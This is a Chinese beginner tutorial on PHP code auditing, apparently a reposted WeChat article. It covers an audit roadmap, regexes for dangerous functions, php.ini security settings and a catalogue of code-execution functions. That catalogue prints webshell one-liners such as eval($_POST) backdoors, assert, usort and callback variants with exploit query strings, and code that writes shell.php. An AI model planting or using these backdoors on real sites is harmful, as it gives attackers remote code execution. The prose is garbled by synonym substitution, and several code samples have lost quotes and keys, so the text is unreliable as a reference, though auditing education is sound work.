一块来学PHP代码审计 | 新手入门篇
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMn2CxC8e1ciaQ6rHamLqiaguk5VP8g2dsSk3qQ8dFW85icOyYowWBsT6Vw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMhTWCKyxesTgpkTxrTfNEjlDgtiaYrzl5YnYZn7Ro3Sz72jHAicMRDUwg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;">PHP代码入门</strong><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMLcPLD1EvABAywQG2nX5fcbBy1gyZsuzdCvdNSAkCC3s6CaJUgytK3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">代码审计指的是对源代码进行<span style="color: black;">检测</span>,寻找代码中的bug和安全缺陷,这个是一项需要多方面技能的技术,<span style="color: black;">因此</span><span style="color: black;">咱们</span>需要<span style="color: black;">把握</span>编程,漏洞原理,还要<span style="color: black;">认识</span>系统服务和中间件等。<span style="color: black;">然则</span>这对<span style="color: black;">咱们</span>小白<span style="color: black;">来讲</span>,可能<span style="color: black;">便是</span>一个“代码审计之从入门到放弃”的悲惨故事,<span style="color: black;">因此</span><span style="color: black;">咱们</span>的学习路线很重要,<span style="color: black;">这儿</span><span style="color: black;">咱们</span>就<span style="color: black;">一块</span>来制定一个学习路线理清<span style="color: black;">咱们</span>的学习思路。</span><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMhTWCKyxesTgpkTxrTfNEjlDgtiaYrzl5YnYZn7Ro3Sz72jHAicMRDUwg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;">小白代码审计的养成之路—<span style="color: black;">基本</span></strong><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMLcPLD1EvABAywQG2nX5fcbBy1gyZsuzdCvdNSAkCC3s6CaJUgytK3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;">
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;"><span style="color: black;">一 、编程语言篇</span></strong></h3><span style="color: black;">1.前端语言 html/javascript/dom元素<span style="color: black;">运用</span> <span style="color: black;">重点</span>是为了挖掘xss漏洞 jquery <span style="color: black;">重点</span>写<span style="color: black;">有些</span><span style="color: black;">触及</span>到CSRF脚本<span style="color: black;">运用</span>的<span style="color: black;">或</span>DOM型XSS,JSON劫持等,</span><span style="color: black;">2.后端语言 <span style="color: black;">基本</span>语法要<span style="color: black;">晓得</span>例如 变量类型,常量,数组(python 是列表,元组,字典),对象,类的调用,引用等, MVC设计模式要清楚,<span style="color: black;">由于</span>大部分<span style="color: black;">目的</span>程序都是基于MVC写的,<span style="color: black;">包含</span>不限于php,python,java(<span style="color: black;">这儿</span>我想<span style="color: black;">大众</span>都<span style="color: black;">晓得</span>编程语言会一种就一通通百通)。不<span style="color: black;">需求</span>会写,<span style="color: black;">然则</span><span style="color: black;">必定</span>能看懂,<span style="color: black;">况且</span>要看懂<span style="color: black;">规律</span>,<span style="color: black;">晓得</span><span style="color: black;">那些</span>功能点会用什么方式去写,可能会<span style="color: black;">显现</span>什么类型漏洞,方便挖掘常规类型漏洞,更方便挖掘<span style="color: black;">规律</span>漏洞</span>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;"><span style="color: black;">二 、渗透技巧篇</span></strong></h3><span style="color: black;">1.会用<span style="color: black;">平常</span>的渗透工具如sqlmap, awvs,burpsuite等进行渗透(能用工具直接挖洞,当脚本小子<span style="color: black;">亦</span>很香)</span><span style="color: black;">2.能用手工去进行渗透(<span style="color: black;">为何</span>要懂渗透技巧 其一在于你找到漏洞的时候,<span style="color: black;">一般</span>的<span style="color: black;">研发</span>功底是不足以构造PAYLOAD的,需要<span style="color: black;">有些</span>特殊的PADYLOAD构造方式。其二你在找漏洞时,<span style="color: black;">能够</span>辅助你更快的去挖掘漏洞)</span>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;"><span style="color: black;">三 、辅助技术篇</span></strong></h3><span style="color: black;">1.协议 例如HTTP传输方式,dict:// file://等,懂得Header头<span style="color: black;">怎样</span>伪造 <span style="color: black;">例如</span>XFF注入时的x-forward-for,cookie注入,CRLF身份请求伪造等。</span><span style="color: black;">2.程序搭建 你审计时要学会程序搭建,<span style="color: black;">否则</span>静态审计时,<span style="color: black;">没法</span>进行动态调试,方便你更快更<span style="color: black;">有效</span>挖掘漏洞</span><span style="color: black;">3.URL链接构造<span style="color: black;">或</span>URL路由</span><span style="color: black;">4.SQL语句及数据库特性 这个<span style="color: black;">重点</span><span style="color: black;">触及</span>到SQL注入及sql注入的payload构造绕过</span><span style="color: black;">5.中间件及服务器特性 有的代码漏洞 是基于中间件及服务器特性<span style="color: black;">导致</span>的 例如IIS6.0的解析 nginx的解析漏洞等</span><span style="color: black;">6.审计辅助工具 IDE,phpstrom 审计工具<span style="color: black;">跟踪</span>代码时用到,可与xdebug绑定<span style="color: black;">运用</span>方便调试,源代码审计工具 rips,seay审计工具,辅助你更快的找到漏洞产生点</span>
<h3 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;"><span style="color: black;"><span style="color: black;">4、</span>漏洞挖掘</span></strong></h3><span style="color: black;">1.<span style="color: black;">咱们</span>要懂得漏洞类型产生原理</span><span style="color: black;">2.懂得危险函数的参数<span style="color: black;">欠妥</span><span style="color: black;">运用</span>可<span style="color: black;">导致</span>的漏洞威胁 例如<span style="color: black;">触及</span>到命令执行代码执行的eval,assert,array_map,usort等,例如本身函数的脆弱性,is_numeric,md5等</span><span style="color: black;">3.晓得php函数的脆弱性 <span style="color: black;">例如</span>==与=== ,===并不是强大无比不可绕过的,<span style="color: black;">亦</span>要结合代码设计<span style="color: black;">规律</span></span><span style="color: black;">4.php的奇技淫巧</span><span style="color: black;">5.php版本及配置<span style="color: black;">欠妥</span>结合函数<span style="color: black;">欠妥</span>利用<span style="color: black;">导致</span>的漏洞威胁</span><span style="color: black;">最后:这些东西<span style="color: black;">咱们</span><span style="color: black;">能够</span>去那里学呢?关于前后端语言、sql语法这些,<span style="color: black;">咱们</span><span style="color: black;">能够</span>去菜鸟教程(<span style="color: black;">咱们</span>要的是能看懂,<span style="color: black;">因此</span>完全<span style="color: black;">能够</span>自学)。其他的<span style="color: black;">咱们</span>在后续的<span style="color: black;">文案</span>中会继续<span style="color: black;">仔细</span>学习。</span><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMhTWCKyxesTgpkTxrTfNEjlDgtiaYrzl5YnYZn7Ro3Sz72jHAicMRDUwg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;">小白代码审计的养成之路—思路</strong><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMLcPLD1EvABAywQG2nX5fcbBy1gyZsuzdCvdNSAkCC3s6CaJUgytK3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">代码审计的思路<span style="color: black;">亦</span>是<span style="color: black;">咱们</span>需要去学习的</span><strong style="color: blue;"><span style="color: black;">两大审计的基本<span style="color: black;">办法</span></span></strong><span style="color: black;">跟踪用户的输入数据,判断数据进入的每一个代码<span style="color: black;">规律</span><span style="color: black;">是不是</span>有可利用的点,此处的代码逻辑<span style="color: black;">能够</span>是一个函数,<span style="color: black;">或</span>是条小小的<span style="color: black;">要求</span>判断语句。</span><span style="color: black;"><span style="color: black;">按照</span><span style="color: black;">区别</span>编程语言的特性,及其历史上经常产生漏洞的<span style="color: black;">有些</span>函数,功能,把这些点找出来,在分析函数调用时的参数,<span style="color: black;">倘若</span>参数是用户可控,就<span style="color: black;">特别有</span>可能<span style="color: black;">诱发</span>安全漏洞</span><strong style="color: blue;"><span style="color: black;">寻找漏洞前准备</span></strong><span style="color: black;">理解<span style="color: black;">此刻</span>的cms大致可分为两种,单入口模式和多入口模式.</span><span style="color: black;">1.多入口模式cms :每一个功能都需要<span style="color: black;">拜访</span><span style="color: black;">区别</span>的文件。</span><span style="color: black;">2.单入口模式的cms:MVC的<span style="color: black;">研发</span>出来的,<span style="color: black;">因此</span><span style="color: black;">咱们</span>要清楚mvc架构</span><strong style="color: blue;"><span style="color: black;">挖掘漏洞方式</span></strong><span style="color: black;">1、搜索<span style="color: black;">有些</span>获取用户输入数据的函数,来找到用户输入数据的源头,之后<span style="color: black;">咱们</span>从<span style="color: black;">这儿</span>为起点,跟踪数据的流向,分析在这<span style="color: black;">全部</span>过程中数据的处理<span style="color: black;">状况</span>,<span style="color: black;">从而</span>定位可能触发漏洞的点。</span><span style="color: black;">2、搜索<span style="color: black;">有些</span>经常产生安全问题的函数,<span style="color: black;">例如</span>执行数 据库<span style="color: black;">查找</span>的函数,执行系统命令的函数,文件操作类函数等等,在<span style="color: black;">经过</span>回溯这些函数在被调用时参数,判断参数<span style="color: black;">是不是</span><span style="color: black;">咱们</span>可控,<span style="color: black;">从而</span>定位漏洞点。</span><span style="color: black;">3.常用的php正则</span><span style="color: black;">$_SERVER|$_COOKIE|$_REQUEST|$_GET|$_POST 获取用户输入</span><span style="color: black;">eval(|assert(|system( 命令执行</span><span style="color: black;">require(|require_once(|include(|include_once( 文件<span style="color: black;">包括</span></span><span style="color: black;">file_get_contents(|file(|fopen(|highlight_file(|show_source(|unlink 文件读取,写入,删除</span><span style="color: black;">simplexml_load_string XXE</span><span style="color: black;">unserialize 反序列化漏洞</span><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMhTWCKyxesTgpkTxrTfNEjlDgtiaYrzl5YnYZn7Ro3Sz72jHAicMRDUwg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;"><span style="color: black;">首要</span>PHP的配置</strong><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMLcPLD1EvABAywQG2nX5fcbBy1gyZsuzdCvdNSAkCC3s6CaJUgytK3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;"><span style="color: black;">1.php的配置-配置文件</span></strong><span style="color: black;">php.ini</span><span style="color: black;"> 全局</span><span style="color: black;">.user.ini</span><span style="color: black;"> 用户</span><strong style="color: blue;"><span style="color: black;">2.PHP的配置-语法</span></strong><span style="color: black;"><span style="color: black;">设置指令格式</span>:</span><span style="color: black;">directive=value</span><span style="color: black;">,</span><span style="color: black;">指令名(directive)<span style="color: black;">体积</span>写<span style="color: black;">敏锐</span>(foo=bar<span style="color: black;">区别</span>于FOO=bar),</span><span style="color: black;">值(value)<span style="color: black;">能够</span>是:用引号界定的字符串(”foo”)一个数字(整数或浮点数0,1,55,-1,32.2)、一个php常量(E_ALL,M_PI)、一个ini常量(On,Off,none) 、一个表达式(E_ALL&~E_NOTICE)ini文件种的表达示仅<span style="color: black;">运用</span>:位运算符,<span style="color: black;">规律</span>非,圆括号,|位或、&位与、~位非、!<span style="color: black;">规律</span>非、布尔值用On<span style="color: black;">暗示</span>打开,用Off<span style="color: black;">暗示</span>关闭。</span><strong style="color: blue;"><span style="color: black;">3.PHP的配置-变量<span style="color: black;">关联</span>配置</span></strong><span style="color: black;"><span style="color: black;">启用全局变量</span>:</span><span style="color: black;">register_globals = Off</span><span style="color: black;">某些程序如osc需要启用全局变量,这个设置的<span style="color: black;">功效</span>是关闭自动注册全局变量,在设置为On时、php会将</span><span style="color: black;">$POST,$GET,$COOKIE,$ENV,$SESSION</span><span style="color: black;">数组中的</span><span style="color: black;">$key=>$value</span><span style="color: black;">直接注册为变量</span><span style="color: black;">($POST就会被注册为$username)</span><span style="color: black;">这会<span style="color: black;">导致</span>三个问题:</span><span style="color: black;">1.不<span style="color: black;">晓得</span>变量从哪里来的,($POSTl来的还是$SESSION来的呢?)不方便别人阅读代码</span><span style="color: black;">2.变量之间相互覆盖,<span style="color: black;">导致</span>不必要的麻烦</span><span style="color: black;">3.安全问题。<span style="color: black;">因此</span><span style="color: black;">通常</span>设置为Off。</span><span style="color: black;"><span style="color: black;">短标签</span>:</span><span style="color: black;">short_open_tag = On</span><span style="color: black;">这个设置决定<span style="color: black;">是不是</span><span style="color: black;">准许</span><span style="color: black;">运用</span>php代码<span style="color: black;">起始</span>标志的缩写形式(</span><span style="color: black;"><? ?></span><span style="color: black;">)。<span style="color: black;">倘若</span>禁用了,必须<span style="color: black;">运用</span>必须<span style="color: black;">运用</span>php代码<span style="color: black;">起始</span>标志的完整形式(</span><span style="color: black;"><?php ?></span><span style="color: black;">)。这个指令<span style="color: black;">亦</span>会影响到缩写形式</span><span style="color: black;"><?=</span><span style="color: black;">,它和</span><span style="color: black;"><?echo</span><span style="color: black;"> 等价。<span style="color: black;">运用</span>此缩写需要</span><span style="color: black;">short_open_tag</span><span style="color: black;">的值为</span><span style="color: black;">On</span><span style="color: black;">,从php5.4.0起,<?=总是可用的。(写shell的时候会判断标签<span style="color: black;">倘若</span>有</span><span style="color: black;"><?php?></span><span style="color: black;">就会拦截,<span style="color: black;">倘若</span>开启了短标签就<span style="color: black;">能够</span><span style="color: black;">思虑</span>用缩写)</span><strong style="color: blue;"><span style="color: black;">4.PHP的配置-<span style="color: black;">平常</span>重要配置-安全模式</span></strong><span style="color: black;"><span style="color: black;">安全模式</span>:</span><span style="color: black;">safe_mode = Off</span><span style="color: black;">PHP的安全模式是一个非常重要的内嵌安全机制,能够<span style="color: black;">掌控</span><span style="color: black;">有些</span>php中的函数,<span style="color: black;">例如</span></span><span style="color: black;">system()</span><span style="color: black;">,<span style="color: black;">同期</span>把很多文件操作函数进行了权限<span style="color: black;">掌控</span>,<span style="color: black;">亦</span>不<span style="color: black;">准许</span>某些关键文件的文件,<span style="color: black;">例如</span>/etc/passwd,但默认的php.ini是<span style="color: black;">无</span>打开安全模式的(这个特性自php5.3.0起废弃并在php5.4.0起移除)</span><span style="color: black;"><span style="color: black;">安全模式下执行程序主目录</span>:</span><span style="color: black;">safe_mode_exec_dir = /var/www/html</span><span style="color: black;"><span style="color: black;">倘若</span>php<span style="color: black;">运用</span>了安全模式,</span><span style="color: black;">system()</span><span style="color: black;">和其他程序执行函数将拒绝<span style="color: black;">起步</span>不<span style="color: black;">这里</span>目录中的程序。必须<span style="color: black;">运用</span>/<span style="color: black;">做为</span>目录分隔符,<span style="color: black;">包含</span>windows中。简单<span style="color: black;">来讲</span>,<span style="color: black;">便是</span>在这个目录下才可执行。</span><span style="color: black;"><span style="color: black;">禁用类/函数</span>:</span><span style="color: black;">disable_classes = ,disable_functions = ,disable_functions = opendir,readdir,scandir,fopen,unlink</span><span style="color: black;">禁用某些类,禁止某些函数。接受逗号分隔的函数名列表<span style="color: black;">做为</span>参数。只能设置在</span><span style="color: black;">php.ini</span><span style="color: black;">中。</span><strong style="color: blue;"><span style="color: black;">5.PHP的配置-<span style="color: black;">平常</span>的重要配置-上传文件及目录权限</span></strong><span style="color: black;"><span style="color: black;">设置上传及最大上传文件<span style="color: black;">体积</span></span>:</span><span style="color: black;">file_uploads = On ,upload_max_filesize = 8M</span><span style="color: black;"><span style="color: black;">文件上传临时目录</span>:</span><span style="color: black;">upload_tmp_dir =</span><span style="color: black;"> 上传文件临时<span style="color: black;">保留</span>的目录,需要可写,<span style="color: black;">倘若</span>不设置,则采用系统临时目录。(</span><span style="color: black;">/tmp,C:WindowsTemp</span><span style="color: black;">)</span><span style="color: black;"><span style="color: black;">用户<span style="color: black;">拜访</span>目录限制</span>:</span><span style="color: black;">open_basedir = .:/tmp/</span><span style="color: black;"><span style="color: black;">运用</span>open_basedir选项能够<span style="color: black;">掌控</span>php脚本只能<span style="color: black;">拜访</span>指定目录,<span style="color: black;">这般</span>能避免php脚本<span style="color: black;">拜访</span>本<span style="color: black;">不该</span>该<span style="color: black;">拜访</span>的文件,<span style="color: black;">必定</span>程度上限制了phpshell的<span style="color: black;">害处</span>,<span style="color: black;">通常</span>设置为只能<span style="color: black;">拜访</span>网站目录,<span style="color: black;">暗示</span><span style="color: black;">准许</span><span style="color: black;">拜访</span>当前目录(即php脚本文件所在之目录)和/tmp/目录,有效防止php木马跨站运行。</span><strong style="color: blue;"><span style="color: black;">6.PHP的配置-<span style="color: black;">平常</span>的重要配置-错误信息</span></strong><span style="color: black;"><span style="color: black;">错误信息<span style="color: black;">掌控</span></span>:</span><span style="color: black;">display_error = On</span><span style="color: black;"><span style="color: black;">是不是</span>将错误信息<span style="color: black;">做为</span>输出的一部分,站点发布后应关闭这个功能,<span style="color: black;">以避免</span>暴露信息。调试的时候打开就好</span><span style="color: black;"><span style="color: black;">设置错误报告级别</span>:</span><span style="color: black;">error_reporting = E_ALL</span><span style="color: black;">这个设置的<span style="color: black;">功效</span>是将错误级别设置为最高,<span style="color: black;">表示</span>所有错误,方便查错,有利于写出高质量代码。日志级别是<span style="color: black;">有些</span>常量,在</span><span style="color: black;">php.ini</span><span style="color: black;">中有写,<span style="color: black;">举荐</span><span style="color: black;">运用</span></span><span style="color: black;">E_ALL|E_STRICT</span><span style="color: black;">,即所有级别。</span><span style="color: black;"><span style="color: black;">错误日志</span> :</span><span style="color: black;">error_log =</span><span style="color: black;">错误日志的位置,必须对web用户可写入,<span style="color: black;">倘若</span>不定义则默认写到web服务器的错误日志中去 </span><span style="color: black;">log_error = On</span><span style="color: black;"> <span style="color: black;">意见</span>将错误日志输出到文件,而不直接输出到前端。</span><span style="color: black;">log_errors_max_length = 1024</span><span style="color: black;">错误日志<span style="color: black;">相关</span>信息的最大长度,设置为0的时候<span style="color: black;">暗示</span>无限长度。</span><strong style="color: blue;"><span style="color: black;">7.PHP的配置-<span style="color: black;">平常</span>的重要配置-魔术引号及远程文件</span></strong><span style="color: black;"><span style="color: black;">魔术引号</span> (php5.3.0废弃php5.4.0移除):</span><span style="color: black;">magic_quotes_gpc = On</span><span style="color: black;">magic_quotes_runtime = Off</span><span style="color: black;">为GPC(</span><span style="color: black;">GET/POST/COOKIE</span><span style="color: black;">)操作设置</span><span style="color: black;">magic_quotes</span><span style="color: black;">状态,当</span><span style="color: black;">magic_quotes为On</span><span style="color: black;">所有的</span><span style="color: black;">(单引号)、</span><span style="color: black;">"</span><span style="color: black;">(双引号)、(反斜杆)、和</span><span style="color: black;">NULL</span><span style="color: black;">都被一个反斜杆自动转义</span><span style="color: black;"><span style="color: black;"><span style="color: black;">是不是</span><span style="color: black;">准许</span>打开远程文件</span>:</span><span style="color: black;">allow_url_fopen = On</span><span style="color: black;">本选项激活了url形式的fopen封装协议使得<span style="color: black;">能够</span><span style="color: black;">拜访</span>url对象例如文件。默认封装协议<span style="color: black;">供给</span>用ftp和http协议来<span style="color: black;">拜访</span>远程文件,<span style="color: black;">有些</span>扩展库例如zlib可能会注册<span style="color: black;">更加多</span>的封装协议</span><span style="color: black;"><?php echo file_get_contents("http://php.net"); ?></span><span style="color: black;"><span style="color: black;"><span style="color: black;">是不是</span><span style="color: black;">准许</span><span style="color: black;">包括</span>远程文件</span>:</span><span style="color: black;">allow_url_include = Off</span><span style="color: black;">本选项激活<span style="color: black;">准许</span></span><span style="color: black;">include,include_once,require,require_once</span><span style="color: black;">等函数<span style="color: black;">运用</span>url形式的fopen封装协议。简单<span style="color: black;">来讲</span><span style="color: black;">便是</span><span style="color: black;">能够</span><span style="color: black;">包括</span>远程文件。 </span><span style="color: black;"><?php include("http://php.net"); ?></span><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMhTWCKyxesTgpkTxrTfNEjlDgtiaYrzl5YnYZn7Ro3Sz72jHAicMRDUwg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><strong style="color: blue;">PHP代码执行函数总结</strong><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMLcPLD1EvABAywQG2nX5fcbBy1gyZsuzdCvdNSAkCC3s6CaJUgytK3Q/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">PHP中<span style="color: black;">能够</span>执行代码的函数,常用于编写一句话木马,可能<span style="color: black;">引起</span>代码执行漏洞,<span style="color: black;">这儿</span>对代码执行函数做<span style="color: black;">有些</span>归纳。</p><span style="color: black;"><span style="color: black;">平常</span>代码执行函数</span>,如
</span><span style="color: black;">array_map()、call_user_func()、call_user_func_array(),array_filter,usort,uasort()</span><span style="color: black;">文件操作函数、动态函数</span><span style="color: black;">($a($b))</span><span style="color: black;">1.</span><span style="color: black;">eval()</span><span style="color: black;">eval() 函数把字符串<span style="color: black;">根据</span> PHP 代码来计算,如<span style="color: black;">平常</span>的一句话后门程序:</span><span style="color: black;"><?php eval($_POST)?></span><span style="color: black;">2.</span><span style="color: black;">assert()</span><span style="color: black;">与</span><span style="color: black;">eval()</span><span style="color: black;">类似,字符串被 </span><span style="color: black;">assert()</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">当做 PHP 代码来执行,如:</p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">示例代码:</p>
</span><span style="color: black;"><?php //?cmd=phpinfo() assert($_REQUEST); ?></span><span style="color: black;">3.</span><span style="color: black;">reg_replace()</span><span style="color: black;">mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">搜索subject中匹配pattern的部分, 以replacement进行替换。</p>
</span><span style="color: black;">preg_replace()</span><span style="color: black;">函数<span style="color: black;">本来</span>是执行一个正则表达式的搜索和替换,但<span style="color: black;">由于</span>存在危险的</span><span style="color: black;">/e</span><span style="color: black;">修饰符,使 </span><span style="color: black;">preg_replace()</span><span style="color: black;"> 将</span><span style="color: black;">$replacement</span><span style="color: black;"> 参数当作 PHP 代码</span><span style="color: black;">示例代码:</span><span style="color: black;"><?php //?cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST,"abcd"); ?></span><span style="color: black;">4.</span><span style="color: black;">reate_function()</span><span style="color: black;">create_function()</span><span style="color: black;"><span style="color: black;">重点</span>用来创建匿名函数,<span style="color: black;">倘若</span><span style="color: black;">无</span>严格对参数传递进行过滤,攻击者<span style="color: black;">能够</span>构造特殊字符串传递给</span><span style="color: black;">create_function()</span><span style="color: black;">执行任意命令。</span><span style="color: black;">代码示例:</span><span style="color: black;"><?php //?cmd=phpinfo(); $func =create_function(,$_REQUEST); $func(); ?></span><span style="color: black;">5.</span><span style="color: black;">array_map()</span><span style="color: black;">array_map()</span><span style="color: black;">函数将用户自定义函数<span style="color: black;">功效</span>到数组中的<span style="color: black;">每一个</span>值上,并返回用户自定义函数<span style="color: black;">功效</span>后的带有新值的数组。回调函数接受的参数数目应该和传递给 </span><span style="color: black;">array_map()</span><span style="color: black;"> 函数的数组数目一致。</span><span style="color: black;">代码示例:</span><span style="color: black;"><?php //?func=system&cmd=whoami $func=$GET; $cmd=$GET; $array=$cmd; $new_array=array_map($func,$array); //print_r($new_array); ?></span><span style="color: black;">6.</span><span style="color: black;">call_user_func()/call_user_func_array ()</span><span style="color: black;">call_user_func</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> 把<span style="color: black;">第1</span>个参数<span style="color: black;">做为</span>回调函数调用,其余参数是回调函数的参数。</p>
</span><span style="color: black;">call_user_func_array</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> 调用回调函数,并把一个数组参数<span style="color: black;">做为</span>回调函数的参数</p>
</span><span style="color: black;"><?php //?cmd=phpinfo() @call_user_func(assert,$_GET); ?></span><span style="color: black;"><?php //?cmd=phpinfo() $cmd=$_GET; $array=$cmd; call_user_func_array("assert",$array); ?></span><span style="color: black;">7.</span><span style="color: black;">array_filter()</span><span style="color: black;">array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )</span><span style="color: black;">依次将 </span><span style="color: black;">array</span><span style="color: black;">数组中的<span style="color: black;">每一个</span>值传递到</span><span style="color: black;">callback</span><span style="color: black;">函数。<span style="color: black;">倘若</span> </span><span style="color: black;">callback</span><span style="color: black;">函数返回</span><span style="color: black;">true</span><span style="color: black;">,则</span><span style="color: black;">array</span><span style="color: black;">数组的当前值会被<span style="color: black;">包括</span>在返回的结果数组中。数组的键名<span style="color: black;">保存</span>不变。</span><span style="color: black;"><?php //?func=system&cmd=whoami $cmd=$GET; $array1=array($cmd); $func =$GET; array_filter($array1,$func); ?></span><span style="color: black;">8.</span><span style="color: black;">usort()、uasort()</span><span style="color: black;">usort() <span style="color: black;">经过</span>用户自定义的比较函数对数组进行排序。</span><span style="color: black;">uasort() <span style="color: black;">运用</span>用户自定义的比较函数对数组中的值进行排序并保持索引<span style="color: black;">相关</span> 。</span><span style="color: black;">代码示例:php环境>=5.6<span style="color: black;">才可</span>用 </span><span style="color: black;"><?php usort(...$_GET);?></span><span style="color: black;"> 利用方式:</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">test.php?1[]=1-1&1[]=eval($_POST)&2=assert</p> x=phpinfo();
</span><span style="color: black;"><span style="color: black;"><?php</span> usort($_GET,<span style="color: black;">asse</span>.<span style="color: black;">rt</span>);<span style="color: black;">?></span>利用方式:test.php?<span style="color: black;">1</span>=<span style="color: black;">1</span>+<span style="color: black;">1</span>&<span style="color: black;">2</span>=<span style="color: black;">eval</span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">($_POST)</p>
</span><span style="color: black;">9.文件操作函数</span><span style="color: black;">file_put_contents()</span><span style="color: black;">
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"> 函数把一个字符串写入文件中。</p>fputs() 函数写入文件
</span><span style="color: black;">代码示例:</span><span style="color: black;"><?php $test=<?php eval($_POST);?>; file_put_contents(test1.php,$test); ?> <?php fputs(fopen(shell.php,w),<?php eval($_POST)?>); ?></span><span style="color: black;">10.动态函数</span><span style="color: black;">PHP函数直接由字符串拼接</span><span style="color: black;">代码示例:</span><span style="color: black;"><?php //?a=assert&b=phpinfo() $GET($GET); ?></span>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb674XwurfV06XSswak4UQicMlV2SvuocQB1NEqKzVrDOSNaicWHiaEeJibdaLrYeI2LdQiaeqrXpS2nNAg/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p><strong style="color: blue;"><span style="color: black;">本文为系列更新,请关注后续发布</span></strong>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;"><span style="color: black;">文案</span>转载自公众号:掌控安全EDU</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><img src="https://mmbiz.qpic.cn/mmbiz_png/Ok4fxxCpBb6OLwHohYU7UjX5anusw3ZzxxUKM0Ert9iaakSvib40glppuwsWytjDfiaFx1T25gsIWL5c8c7kicamxw/640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1" style="width: 50%; margin-bottom: 20px;"></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">- End -</span></p>
<p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;"><span style="color: black;">精彩<span style="color: black;">举荐</span></span></strong></p>
<h2 style="color: black; text-align: left; margin-bottom: 10px;"><a style="color: black;"><span style="color: black;">SQL注入<span style="color: black;">基本</span>整理及Tricks总结</span></a></h2>
<h2 style="color: black; text-align: left; margin-bottom: 10px;"><a style="color: black;"><span style="color: black;"><span style="color: black;">秘码</span>学学习笔记 之 paillier crypto</span></a>system</h2>
<h2 style="color: black; text-align: left; margin-bottom: 10px;"><a style="color: black;"><span style="color: black;">ARM设备武器化指南·</span></a><a style="color: black;"><span style="color: black;">破·Kali.Nethunter.2020a.上手实操</span></a></h2>
<h2 style="color: black; text-align: left; margin-bottom: 10px;"><a style="color: black;"><span style="color: black;">.htaccess利用与Bypass方式总结</span></a></h2>
